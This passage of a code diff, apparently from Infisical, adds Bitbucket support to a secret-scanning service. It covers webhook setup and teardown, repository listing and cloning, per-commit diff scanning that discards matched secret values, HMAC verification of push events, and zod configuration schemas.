+        }
+      }
+    );
+
+    return callback({
+      credentials: { webhookId: data.uuid, webhookSecret: alphaNumericNanoId(64) }
+    });
+  };
+
+  const postInitialization: TSecretScanningFactoryPostInitialization<
+    TBitbucketDataSourceInput,
+    TBitbucketConnection,
+    TBitbucketDataSourceCredentials
+  > = async ({ dataSourceId, credentials, connection, payload }) => {
+    const { email, apiToken } = connection.credentials;
+    const { webhookId, webhookSecret } = credentials;
+
+    const authHeader = `Basic ${Buffer.from(`${email}:${apiToken}`).toString("base64")}`;
+
+    const cfg = getConfig();
+    const newWebhookUrl = `${cfg.SITE_URL}/secret-scanning/webhooks/bitbucket?dataSourceId=${dataSourceId}`;
+
+    await request.put(
+      `${IntegrationUrls.BITBUCKET_API_URL}/2.0/workspaces/${encodeURIComponent(payload.config.workspaceSlug)}/hooks/${webhookId}`,
+      {
+        description: "Infisical webhook for push events",
+        url: newWebhookUrl,
+        active: true,
+        events: ["repo:push"],
+        secret: webhookSecret
+      },
+      {
+        headers: {
+          Authorization: authHeader,
+          Accept: "application/json"
+        }
+      }
+    );
+  };
+
+  const teardown: TSecretScanningFactoryTeardown<
+    TBitbucketDataSourceWithConnection,
+    TBitbucketDataSourceCredentials
+  > = async ({ credentials, dataSource }) => {
+    const {
+      connection: {
+        credentials: { email, apiToken }
+      },
+      config
+    } = dataSource;
+    const { webhookId } = credentials;
+
+    const authHeader = `Basic ${Buffer.from(`${email}:${apiToken}`).toString("base64")}`;
+
+    try {
+      await request.delete(
+        `${IntegrationUrls.BITBUCKET_API_URL}/2.0/workspaces/${config.workspaceSlug}/hooks/${webhookId}`,
+        {
+          headers: {
+            Authorization: authHeader,
+            Accept: "application/json"
+          }
+        }
+      );
+    } catch (err) {
+      logger.error(`teardown: Bitbucket - Failed to call delete on webhook [webhookId=${webhookId}]`);
+    }
+  };
+
+  const listRawResources: TSecretScanningFactoryListRawResources<TBitbucketDataSourceWithConnection> = async (
+    dataSource
+  ) => {
+    const {
+      connection,
+      config: { includeRepos, workspaceSlug }
+    } = dataSource;
+
+    const repos = await listBitbucketRepositories(connection, workspaceSlug);
+
+    const filteredRepos: typeof repos = [];
+    if (includeRepos.includes("*")) {
+      filteredRepos.push(...repos);
+    } else {
+      filteredRepos.push(...repos.filter((repo) => includeRepos.includes(repo.full_name)));
+    }
+
+    return filteredRepos.map(({ full_name, uuid }) => ({
+      name: full_name,
+      externalId: uuid,
+      type: SecretScanningResource.Repository
+    }));
+  };
+
+  const getFullScanPath: TSecretScanningFactoryGetFullScanPath<TBitbucketDataSourceWithConnection> = async ({
+    dataSource,
+    resourceName,
+    tempFolder
+  }) => {
+    const {
+      connection: {
+        credentials: { apiToken, email }
+      }
+    } = dataSource;
+
+    const repoPath = join(tempFolder, "repo.git");
+
+    if (!BasicRepositoryRegex.test(resourceName)) {
+      throw new Error("Invalid Bitbucket repository name");
+    }
+
+    const { username } = await getBitbucketUser({ email, apiToken });
+
+    await cloneRepository({
+      cloneUrl: `https://${encodeURIComponent(username)}:${apiToken}@bitbucket.org/${resourceName}.git`,
+      repoPath
+    });
+
+    return repoPath;
+  };
+
+  const getDiffScanResourcePayload: TSecretScanningFactoryGetDiffScanResourcePayload<
+    TQueueBitbucketResourceDiffScan["payload"]
+  > = ({ repository }) => {
+    return {
+      name: repository.full_name,
+      externalId: repository.uuid,
+      type: SecretScanningResource.Repository
+    };
+  };
+
+  const getDiffScanFindingsPayload: TSecretScanningFactoryGetDiffScanFindingsPayload<
+    TBitbucketDataSourceWithConnection,
+    TQueueBitbucketResourceDiffScan["payload"]
+  > = async ({ dataSource, payload, resourceName, configPath }) => {
+    const {
+      connection: {
+        credentials: { apiToken, email }
+      }
+    } = dataSource;
+
+    const { push, repository } = payload;
+
+    const allFindings: SecretMatch[] = [];
+
+    const authHeader = `Basic ${Buffer.from(`${email}:${apiToken}`).toString("base64")}`;
+
+    for (const change of push.changes) {
+      for (const commit of change.commits) {
+        // eslint-disable-next-line no-await-in-loop
+        const { data: diffstat } = await request.get<{
+          values: {
+            status: "added" | "modified" | "removed" | "renamed";
+            new?: { path: string };
+            old?: { path: string };
+          }[];
+        }>(`${IntegrationUrls.BITBUCKET_API_URL}/2.0/repositories/${repository.full_name}/diffstat/${commit.hash}`, {
+          headers: {
+            Authorization: authHeader,
+            Accept: "application/json"
+          }
+        });
+
+        // eslint-disable-next-line no-continue
+        if (!diffstat.values) continue;
+
+        for (const file of diffstat.values) {
+          if ((file.status === "added" || file.status === "modified") && file.new?.path) {
+            const filePath = file.new.path;
+
+            // eslint-disable-next-line no-await-in-loop
+            const { data: patch } = await request.get<string>(
+              `https://api.bitbucket.org/2.0/repositories/${repository.full_name}/diff/${commit.hash}`,
+              {
+                params: {
+                  path: filePath
+                },
+                headers: {
+                  Authorization: authHeader
+                },
+                responseType: "text"
+              }
+            );
+
+            // eslint-disable-next-line no-continue
+            if (!patch) continue;
+
+            // eslint-disable-next-line no-await-in-loop
+            const findings = await scanContentAndGetFindings(replaceNonChangesWithNewlines(`\n${patch}`), configPath);
+
+            const adjustedFindings = findings.map((finding) => {
+              const startLine = convertPatchLineToFileLineNumber(patch, finding.StartLine);
+              const endLine =
+                finding.StartLine === finding.EndLine
+                  ? startLine
+                  : convertPatchLineToFileLineNumber(patch, finding.EndLine);
+              const startColumn = finding.StartColumn - 1; // subtract 1 for +
+              const endColumn = finding.EndColumn - 1; // subtract 1 for +
+              const authorName = commit.author.user?.display_name || commit.author.raw.split(" <")[0];
+              const emailMatch = commit.author.raw.match(/<(.*)>/);
+              const authorEmail = emailMatch?.[1] ?? "";
+
+              return {
+                ...finding,
+                StartLine: startLine,
+                EndLine: endLine,
+                StartColumn: startColumn,
+                EndColumn: endColumn,
+                File: filePath,
+                Commit: commit.hash,
+                Author: authorName,
+                Email: authorEmail,
+                Message: commit.message,
+                Fingerprint: `${commit.hash}:${filePath}:${finding.RuleID}:${startLine}:${startColumn}`,
+                Date: commit.date,
+                Link: `https://bitbucket.org/${resourceName}/src/${commit.hash}/${filePath}#lines-${startLine}`
+              };
+            });
+
+            allFindings.push(...adjustedFindings);
+          }
+        }
+      }
+    }
+
+    return allFindings.map(
+      ({
+        // discard match and secret as we don't want to store
+        Match,
+        Secret,
+        ...finding
+      }) => ({
+        details: titleCaseToCamelCase(finding),
+        fingerprint: finding.Fingerprint,
+        severity: SecretScanningFindingSeverity.High,
+        rule: finding.RuleID
+      })
+    );
+  };
+
+  return {
+    initialize,
+    postInitialization,
+    listRawResources,
+    getFullScanPath,
+    getDiffScanResourcePayload,
+    getDiffScanFindingsPayload,
+    teardown
+  };
+};
--- a/backend/src/ee/services/secret-scanning-v2/bitbucket/bitbucket-secret-scanning-schemas.ts
+++ b/backend/src/ee/services/secret-scanning-v2/bitbucket/bitbucket-secret-scanning-schemas.ts
@ -0,0 +1,97 @@
+import { z } from "zod";
+
+import {
+  SecretScanningDataSource,
+  SecretScanningResource
+} from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-enums";
+import {
+  BaseCreateSecretScanningDataSourceSchema,
+  BaseSecretScanningDataSourceSchema,
+  BaseSecretScanningFindingSchema,
+  BaseUpdateSecretScanningDataSourceSchema,
+  GitRepositoryScanFindingDetailsSchema
+} from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-schemas";
+import { SecretScanningDataSources } from "@app/lib/api-docs";
+import { BasicRepositoryRegex } from "@app/lib/regex";
+import { AppConnection } from "@app/services/app-connection/app-connection-enums";
+
+export const BitbucketDataSourceConfigSchema = z.object({
+  workspaceSlug: z
+    .string()
+    .min(1, "Workspace slug required")
+    .max(128)
+    .describe(SecretScanningDataSources.CONFIG.BITBUCKET.workspaceSlug),
+  includeRepos: z
+    .array(
+      z
+        .string()
+        .min(1)
+        .max(256)
+        .refine((value) => value === "*" || BasicRepositoryRegex.test(value), "Invalid repository name format")
+    )
+    .nonempty("One or more repositories required")
+    .max(100, "Cannot configure more than 100 repositories")
+    .default(["*"])
+    .describe(SecretScanningDataSources.CONFIG.BITBUCKET.includeRepos)
+});
+
+export const BitbucketDataSourceSchema = BaseSecretScanningDataSourceSchema({
+  type: SecretScanningDataSource.Bitbucket,
+  isConnectionRequired: true
+})
+  .extend({
+    config: BitbucketDataSourceConfigSchema
+  })
+  .describe(
+    JSON.stringify({
+      title: "Bitbucket"
+    })
+  );
+
+export const CreateBitbucketDataSourceSchema = BaseCreateSecretScanningDataSourceSchema({
+  type: SecretScanningDataSource.Bitbucket,
+  isConnectionRequired: true
+})
+  .extend({
+    config: BitbucketDataSourceConfigSchema
+  })
+  .describe(
+    JSON.stringify({
+      title: "Bitbucket"
+    })
+  );
+
+export const UpdateBitbucketDataSourceSchema = BaseUpdateSecretScanningDataSourceSchema(
+  SecretScanningDataSource.Bitbucket
+)
+  .extend({
+    config: BitbucketDataSourceConfigSchema.optional()
+  })
+  .describe(
+    JSON.stringify({
+      title: "Bitbucket"
+    })
+  );
+
+export const BitbucketDataSourceListItemSchema = z
+  .object({
+    name: z.literal("Bitbucket"),
+    connection: z.literal(AppConnection.Bitbucket),
+    type: z.literal(SecretScanningDataSource.Bitbucket)
+  })
+  .describe(
+    JSON.stringify({
+      title: "Bitbucket"
+    })
+  );
+
+export const BitbucketFindingSchema = BaseSecretScanningFindingSchema.extend({
+  resourceType: z.literal(SecretScanningResource.Repository),
+  dataSourceType: z.literal(SecretScanningDataSource.Bitbucket),
+  details: GitRepositoryScanFindingDetailsSchema
+});
+
+export const BitbucketDataSourceCredentialsSchema = z.object({
+  webhookId: z.string(),
+  webhookSecret: z.string()
+});
--- a/backend/src/ee/services/secret-scanning-v2/bitbucket/bitbucket-secret-scanning-service.ts
+++ b/backend/src/ee/services/secret-scanning-v2/bitbucket/bitbucket-secret-scanning-service.ts
@ -0,0 +1,103 @@
+import { TSecretScanningV2DALFactory } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-dal";
+import { SecretScanningDataSource } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-enums";
+import { TSecretScanningV2QueueServiceFactory } from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-queue";
+import { crypto } from "@app/lib/crypto";
+import { logger } from "@app/lib/logger";
+import { TKmsServiceFactory } from "@app/services/kms/kms-service";
+import { KmsDataKey } from "@app/services/kms/kms-types";
+
+import {
+  TBitbucketDataSource,
+  TBitbucketDataSourceCredentials,
+  TBitbucketPushEvent
+} from "./bitbucket-secret-scanning-types";
+
+export const bitbucketSecretScanningService = (
+  secretScanningV2DAL: TSecretScanningV2DALFactory,
+  secretScanningV2Queue: Pick<TSecretScanningV2QueueServiceFactory, "queueResourceDiffScan">,
+  kmsService: Pick<TKmsServiceFactory, "createCipherPairWithDataKey">
+) => {
+  const handlePushEvent = async (
+    payload: TBitbucketPushEvent & { dataSourceId: string; receivedSignature: string; bodyString: string }
+  ) => {
+    const { push, repository, bodyString, receivedSignature } = payload;
+
+    if (!push?.changes?.length || !repository?.workspace?.uuid) {
+      logger.warn(
+        `secretScanningV2PushEvent: Bitbucket - Insufficient data [changes=${
+          push?.changes?.length ?? 0
+        }] [repository=${repository?.name}] [workspaceUuid=${repository?.workspace?.uuid}]`
+      );
+      return;
+    }
+
+    const dataSource = (await secretScanningV2DAL.dataSources.findOne({
+      id: payload.dataSourceId,
+      type: SecretScanningDataSource.Bitbucket
+    })) as TBitbucketDataSource | undefined;
+
+    if (!dataSource) {
+      logger.error(
+        `secretScanningV2PushEvent: Bitbucket - Could not find data source [workspaceUuid=${repository.workspace.uuid}]`
+      );
+      return;
+    }
+
+    const {
+      isAutoScanEnabled,
+      config: { includeRepos },
+      encryptedCredentials,
+      projectId
+    } = dataSource;
+
+    if (!encryptedCredentials) {
+      logger.info(
+        `secretScanningV2PushEvent: Bitbucket - Could not find encrypted credentials [dataSourceId=${dataSource.id}] [workspaceUuid=${repository.workspace.uuid}]`
+      );
+      return;
+    }
+
+    const { decryptor } = await kmsService.createCipherPairWithDataKey({
+      type: KmsDataKey.SecretManager,
+      projectId
+    });
+
+    const decryptedCredentials = decryptor({ cipherTextBlob: encryptedCredentials });
+
+    const credentials = JSON.parse(decryptedCredentials.toString()) as TBitbucketDataSourceCredentials;
+
+    const hmac = crypto.nativeCrypto.createHmac("sha256", credentials.webhookSecret);
+    hmac.update(bodyString);
+    const calculatedSignature = hmac.digest("hex");
+
+    if (calculatedSignature !== receivedSignature) {
+      logger.error(
+        `secretScanningV2PushEvent: Bitbucket - Invalid signature for webhook [dataSourceId=${dataSource.id}] [workspaceUuid=${repository.workspace.uuid}]`
+      );
+      return;
+    }
+
+    if (!isAutoScanEnabled) {
+      logger.info(
+        `secretScanningV2PushEvent: Bitbucket - ignoring due to auto scan disabled [dataSourceId=${dataSource.id}] [workspaceUuid=${repository.workspace.uuid}]`
+      );
+      return;
+    }
+
+    if (includeRepos.includes("*") || includeRepos.includes(repository.full_name)) {
+      await secretScanningV2Queue.queueResourceDiffScan({
+        dataSourceType: SecretScanningDataSource.Bitbucket,
+        payload,
+        dataSourceId: dataSource.id
+      });
+    } else {
+      logger.info(
+        `secretScanningV2PushEvent: Bitbucket - ignoring due to repository not being present in config [workspaceUuid=${repository.workspace.uuid}] [dataSourceId=${dataSource.id}]`
+      );
+    }
+  };
+
+  return {
+    handlePushEvent
+  };
+};
--- a/Show More
+++ b/Show More